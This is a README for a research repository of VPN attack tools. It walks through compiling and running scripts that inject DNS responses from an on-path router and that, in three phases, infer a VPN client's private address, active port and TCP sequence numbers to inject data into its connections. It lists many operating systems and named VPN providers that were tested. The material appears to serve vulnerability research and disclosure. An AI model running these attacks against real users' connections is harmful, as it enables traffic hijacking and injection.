4.5 KiB
vpn-attacks
Attack Machine Environment
- C++
- libtins (http://libtins.github.io/download/)
Server-side attack
Requirements
- VPN client connected to a VPN server
- Attack machine sitting somewhere in between VPN server and client forwarding all traffic between the two
Note: Full virtual test environment setup for the server-side attack is detailed in the README within the virt-lab
folder
Running the DNS Attack Script
- Change to udp-dns attack folder -
cd other-end-attack/dnuss/full_scan
- Compile attack script -
make
- Check to make sure vpn server has a conntrack entry for some vpn client's dns lookup (on vpn-server vm):
sudo conntrack -L | grep udp
- Try to inject from attack router -
sudo ./uud_send <dns_server_ip> <src_port (53)> <vpn_server_ip> <start_port> <end_port>
Client-side attack
Requirements
- VPN client connected to a VPN server
- Reverse path filtering disabled on the VPN client machine
- Attack router acting as the local network gateway for the victim (VPN client) machine
Running the Full Attack Script
- Rebuild all the attack scripts:
./rebuild_all.sh
cd full_attack
- Change
attack.sh
vars to appropriate values sh attack.sh <remote_ip>
Note: remote_ip
specifies the IP address of the HTTP site.
Testing Indivual attack phases
Phase 1 - Infer victim's private address
cd first_phase
python3 send.py <victim_public_ip> <private_ip_range>
Note: private_ip_range
specifies a /24
network such as 10.7.7.0
.
Phase 2 - Infer the port being used to talk to some remote address
cd sec_phase
- Edit
send.cpp
to use the correct MAC addresses g++ send.cpp -o send -ltins
./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip>
Note: <remote_ip>
is the address we wanna check if the client is connected to and the <remote_port>
is almost always 80 or 443. The <victim_wlan_ip>
is the public address of the victim and <victim_priv_ip>
was found in phase 1. If the scripts not sniffing any challenge acks, then edit the send.cpp
file to uncomment the cout
line that prints out the remainder to check if the size of the encrypted packets has slightly changed on this system.
Phase 3 - Infer exact sequence number and in-window ack
cd third_phase
- Edit
send.cpp
to use the correct MAC addresses g++ send.cpp -o send -ltins
./send <remote_ip> <remote_port> <victim_wlan_ip> <victim_priv_ip> <victim_port>
Note: <victim_port>
was found in phase 2. This script currently just injects a hardcoded string into the TCP connnection but could be easily modified.
Tested operating systems, applications, and VPN providers
Operating systems
* iOS (up to v12.4.1)
* Android (up to v10)
* Ubuntu (v20.04)
* Fedora (v31)
* Debian (v10.2)
* Arch (v2019.05)
* Manjaro (v18.1.1)
* MX Linux (v19)
* Slackware (v14.2)
* Void Linux (rolling)
* Devuan (v2.1)
* Deepin (v15.11)
* FreeBSD (v12.1)
* OpenBSD (v6.6)
* macOS (Sierra, High Sierra, Mojave)
VPN Providers and applications
* Mullvad
* PIA
* ProtonVPN
* PureVPN
* FrootVPN
* VyperVPN
* ExpressVPN
* SlickVPN
* TunnelBear
* SoftEther
* Hotspot Shield
* Betternet
* SecurityKiss
* Spotflux
* CyberGhost
* Surfshark
* IPVanish
* TorGuard
* StrongVPN
* Wang VPN
* Pupa VPN
* Thunder VPN
* Galaxy VPN
* SecureVPN
* Panda VPN Pro
* NordVPN
* SuperVPN Free
* VPN Free
* Wuma VPN PRO
* Xiaoming VPN
* SurfVPN
* BlueWhale VPN
* Orbot
* Lantern
* Psiphon
Source Code License
Copyright (C) 2018-2021 Breakpointing Bad unless otherwise noted. Where another license is included, please follow the licensing and redistribution clauses of the author.
These program are free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.